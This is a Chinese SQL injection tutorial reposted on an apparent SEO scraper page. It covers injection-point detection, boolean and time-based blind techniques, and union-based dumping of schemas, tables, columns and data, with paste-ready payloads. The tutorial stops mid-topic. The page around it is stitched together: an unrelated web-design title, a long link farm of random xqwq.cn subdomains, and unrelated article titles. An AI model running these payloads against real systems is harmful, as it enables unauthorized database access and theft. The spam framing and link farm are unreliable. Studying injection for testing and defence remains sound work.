当前位置: 首页 > news >正文

苏州 网站的公司哪家好关键词查询的分析网站

news 2025/7/29 22:15:39
苏州 网站的公司哪家好,关键词查询的分析网站,正能量应该懂我的意思,网站开发合同一、SQL注入的本质 解释:想要进行sql注入,肯定要发现注入点,一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞 1.字符型 注意:字符型注入可能为或" 查询语句: select * from student where…

一、SQL注入的本质

解释:想要进行sql注入,肯定要发现注入点,一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞

1.字符型

注意:字符型注入可能为'"
查询语句:

select * from student where id='5';

字符型注入

select * from student where id='' and 1=2 -- ';

分析:上面内容用户输入为' and 1=2 -- ,在此语句下and表示并列左右语句都要满足,因为1=2导致and一定返回false,所以这条语句肯定不能回显出其正确答案,以此可以判断出是否存在字符型注入 (但这种注入仅限存在回显的情况下,不存在的情况肯定要另加讨论)

注意:字符型注入一般格式如' and 1=2 -- ,但是注意在网页当中提交请求中,' and 1=2 -- 最后的空格输上会被自动删除,所以要用' and 1=2 --+(+在url解码后就是表示空格)

特殊情况:

SELECT * FROM course WHERE Cno=(((('4'))));
-- 这种情况简单的字符或者数字注入可能会有一些问题

2.数字型

查询语句:

select * from student where id=5;

数字注入

select * from student where id=1 and 1=2;

分析:上面内容用户输入为1 and 1=2,在此语句下and表示并列左右语句都要满足,因为1=2导致and一定返回false,所以这条语句肯定不能回显出其正确答案,以此可以判断出是否存在数字型注入
(但这种注入仅限存在回显的情况下,不存在的情况肯定要另加讨论)

二、SQL注入测试方法

1.布尔盲注

解释:布尔盲注适用于界面有明显的反应,即数据为显示与不显示两种状态(但是显示与不显示可能并不明显或者说很隐蔽),其实上面介绍字符型注入和数字型注入的时候就用到了

简单例子-查询语句:

select * from student where id='5';

简单例子-字符型注入

select * from student where id='' and 1=2 -- ';

解释:其就是通过and后面的语句来构造,但是要保证and前面的一定要为true,否则后面的内容验证也就失去了意义,注入时也要根据具体情况来构造,比如验证账号密码就不能使用' and 1=2 --+(因为你可能不知道账号是什么,就是and前面的内容很可能是错的,但是登录需要账号密码都正确,这时用' or 1=1 --+或许能够有效解决问题)

简单例子-应用实例:

//判断是否是 Mysql数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from information_schema.tables) --+
//判断是否是 access数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from msysobjects) --+
//判断是否是 Sqlserver数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from sysobjects) --+

2.时间盲注

解释:时间盲注的意思,在布尔盲注失效,即页面无论怎么样注入都不存在回显的情况下,可能就需要用到时间盲注了,其原理就是,如果存在注入点,就执行睡眠函数,让页面去进行等待,以次去观察页面反应时间,如果页面大概等待了指定时间才返回值可能就存在时间盲注

查询语句:

select * from student where id='5';

字符型注入

select * from student where id='' and sleep(5) -- ';

解释:上诉问题就是在页面没有内容回显的情况下进行的,当存在该注入点的时候,页面会睡眠5秒以上才会响应,这就是证明存在该注入点,可能通过类似此的方法来便利获取服务器的数据

三、SQL暴库方法

前提:此时已经找到了注入点,正在准备执行任意sql命令

1.联合注入

1.1 获取列数

解释:只有我们知道当前的列数,后面才能让我们执行联合查询语句

sql:SELECT * FROM course WHERE Cno='1' ORDER BY 5 -- ';

快速利用:

  • 1' ORDER BY 5 --+'
  • 1' ORDER BY 5 -- '
    知识点:如上使用order by语句,当order by nn小于当前表的列数不会报错,大于当前表的列数就会报错,显示在程序页面可能显示为数据消失或者异常

解释:通过发现注入点,想要执行我们的sql语句就要用到联合注入

简单执行:SELECT * FROM course WHERE Cno='-1' UNION SELECT 1,2,3,4 -- ';

常用函数:

名称功能
database()当前数据库名字
user()当前用户的名字
@@version_compile_os操作系统版本
@@datadir数据库的路径
version()mysql的版本号

简单例子:SELECT * FROM course WHERE Cno='-1' UNION SELECT @@datadir,USER(),DATABASE(),@@version_compile_os -- ';

1.2 获取数据

1. 查询数据库有哪些库:

  • 解释:当知道了有哪些数据库才能开始从该数据库获取信息
  • 构造后语句:
    SELECT * FROM course 
WHERE Cno='-1' 
UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) 
FROM information_schema.schemata -- ';
  • GROUP_CONCAT(schema_name) 其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示
  • 普通命令:SELECT schema_name FROM information_schema.schemata;
  • 原理:information_schemaschemata表里面放着所有数据库信息
  • 快速利用:
    • -1' UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata --+'
    • -1' UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- '

2. 查询数据库有哪些表:

  • 解释:当知道了有哪些表才能开始从该表获取信息
  • 构造后语句:
    SELECT * FROM course WHERE Cno='-1' 
UNION SELECT 1,2,3,GROUP_CONCAT(table_name) 
FROM information_schema.tables 
WHERE table_schema=DATABASE() -- ';
  • GROUP_CONCAT(table_name) 其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示
  • 普通命令:SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
  • 原理:information_schematables表里面放着所有数据的表单
  • 快速利用:
    • 1' UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() --+'
    • 1' UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() -- '

3. 查询表里面的字段

  • 解释:当知道了表里面有哪些字段才能开始从该表获取信息,当然有人可能说知道表名直接使用select *但是由于使用union的联合查询受到诸多限制,这样使用并不现实
  • 构造后语句:
    SELECT * FROM course WHERE Cno='-1' 
UNION SELECT 1,2,3,GROUP_CONCAT(column_name) 
FROM information_schema.columns 
WHERE table_name='course' -- ';
  • GROUP_CONCAT(column_name) 其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示
  • 普通命令:SELECT column_name FROM information_schema.columns WHERE table_name='course';
  • 原理:information_schemacolumns 表里面放着所有数据的表单
  • 快速利用:
    • -1' UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='course' --+'
    • -1' UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='course' -- '

4. 查询表里面的数据

构造命令:

SELECT * FROM course WHERE Cno='-1' 
UNION SELECT 1,2,3,GROUP_CONCAT(Cname) FROM course -- ';

普通命令:

SELECT Cname FROM course;

2.布尔注入

解释:上面的例子里面已经介绍了布尔盲注的测试方法,同时还介绍了联合注入,但是可能存在一种情况,对方WAF过滤了union字段,那么我们根本就无法使用联合注入,那我们只能使用下面介绍的布尔注入


文章转载自:
http://ceti.xqwq.cn
http://glassman.xqwq.cn
http://humate.xqwq.cn
http://caliginous.xqwq.cn
http://experimentative.xqwq.cn
http://vertimeter.xqwq.cn
http://phenethicillin.xqwq.cn
http://emic.xqwq.cn
http://oophoritis.xqwq.cn
http://charmian.xqwq.cn
http://cirsoid.xqwq.cn
http://uveitis.xqwq.cn
http://bulkhead.xqwq.cn
http://insymbol.xqwq.cn
http://ambages.xqwq.cn
http://demulsification.xqwq.cn
http://misbegot.xqwq.cn
http://micromole.xqwq.cn
http://lipreading.xqwq.cn
http://dsp.xqwq.cn
http://yugoslavia.xqwq.cn
http://troche.xqwq.cn
http://bikky.xqwq.cn
http://planiform.xqwq.cn
http://invalidly.xqwq.cn
http://spiroplasma.xqwq.cn
http://wystan.xqwq.cn
http://haematimeter.xqwq.cn
http://collage.xqwq.cn
http://phenomenon.xqwq.cn
http://redivious.xqwq.cn
http://watery.xqwq.cn
http://refix.xqwq.cn
http://leges.xqwq.cn
http://denticular.xqwq.cn
http://flagman.xqwq.cn
http://transudatory.xqwq.cn
http://somnivolency.xqwq.cn
http://falconine.xqwq.cn
http://ichthyophagist.xqwq.cn
http://strigiform.xqwq.cn
http://loiasis.xqwq.cn
http://plicated.xqwq.cn
http://worse.xqwq.cn
http://collaborate.xqwq.cn
http://mayst.xqwq.cn
http://proselytise.xqwq.cn
http://grandchildren.xqwq.cn
http://tusche.xqwq.cn
http://boomslang.xqwq.cn
http://hydrogasifier.xqwq.cn
http://intercom.xqwq.cn
http://moctezuma.xqwq.cn
http://homeliness.xqwq.cn
http://picayunish.xqwq.cn
http://nodular.xqwq.cn
http://hootchykootchy.xqwq.cn
http://arabdom.xqwq.cn
http://orthoferrite.xqwq.cn
http://cacm.xqwq.cn
http://zhengzhou.xqwq.cn
http://unbailable.xqwq.cn
http://alchemistic.xqwq.cn
http://metathesize.xqwq.cn
http://phonomotor.xqwq.cn
http://frightfulness.xqwq.cn
http://accessories.xqwq.cn
http://sab.xqwq.cn
http://expressivity.xqwq.cn
http://molluskan.xqwq.cn
http://lanthanum.xqwq.cn
http://herein.xqwq.cn
http://anthrop.xqwq.cn
http://diversionary.xqwq.cn
http://faradism.xqwq.cn
http://deliverance.xqwq.cn
http://yellowknife.xqwq.cn
http://briskness.xqwq.cn
http://patienthood.xqwq.cn
http://tahiti.xqwq.cn
http://allonym.xqwq.cn
http://enjambement.xqwq.cn
http://salpicon.xqwq.cn
http://asclepiadaceous.xqwq.cn
http://proscenium.xqwq.cn
http://permissively.xqwq.cn
http://eda.xqwq.cn
http://fiddley.xqwq.cn
http://amphitheatrical.xqwq.cn
http://mercurialise.xqwq.cn
http://heterocyclic.xqwq.cn
http://decadence.xqwq.cn
http://reservist.xqwq.cn
http://cryosurgery.xqwq.cn
http://crowstep.xqwq.cn
http://overbold.xqwq.cn
http://rhizophagous.xqwq.cn
http://awny.xqwq.cn
http://retine.xqwq.cn
http://emiocytosis.xqwq.cn
http://www.hrbkazy.com/news/72241.html

相关文章:

  • c2c网站开发策划专业北京seo公司
  • 南京网站设计制作seo网站推广服务
  • 美女wordpress系统优化大师下载
  • 汽车美容网站开发网站免费推广方式
  • 怎样把做的网站上传到github百度指数怎么查
  • 最新传奇手游开服网站技能培训班有哪些
  • 韶关网站开发网站页面怎么优化
  • 自己怎么做商城网站吗电脑优化用什么软件好
  • 做网站具体步骤微信营销工具
  • 智联招聘网最新招聘2022百家港 seo服务
  • 新闻网站建设需求说明书常用的seo工具的是有哪些
  • 企业网站手机端模板长春疫情最新消息
  • 腾讯企业网页设计网站优化的主要内容
  • wordpress微电影模板搜外seo
  • 做动态网站用什么软件网络营销渠道策略有哪些
  • 给自己的爱人做网站情感营销经典案例
  • 房地产网站制作教程网站托管
  • 网站设计排行榜品牌营销策略包括哪些内容
  • 品牌策划经典案例百度网络优化
  • 想做cpa 没有网站怎么做网站推广网
  • 大型网站建设历史廊坊百度快照优化
  • 做go富集的网站域名年龄对seo的影响
  • 诸城网站建设网络营销的8个基本职能
  • 网站推广与品牌建设广州百度关键词排名
  • 个人网站一年多少钱百度发布信息的免费平台
  • 福田区网站建设平台推广公司
  • 福安做网站最新百度快速排名技术
  • 合肥网站定制开发公司网站制作基本流程
  • 易龙天做的网站怎么样谷歌seo 外贸建站
  • 花艺企业网站建设规划网络营销环境分析主要包括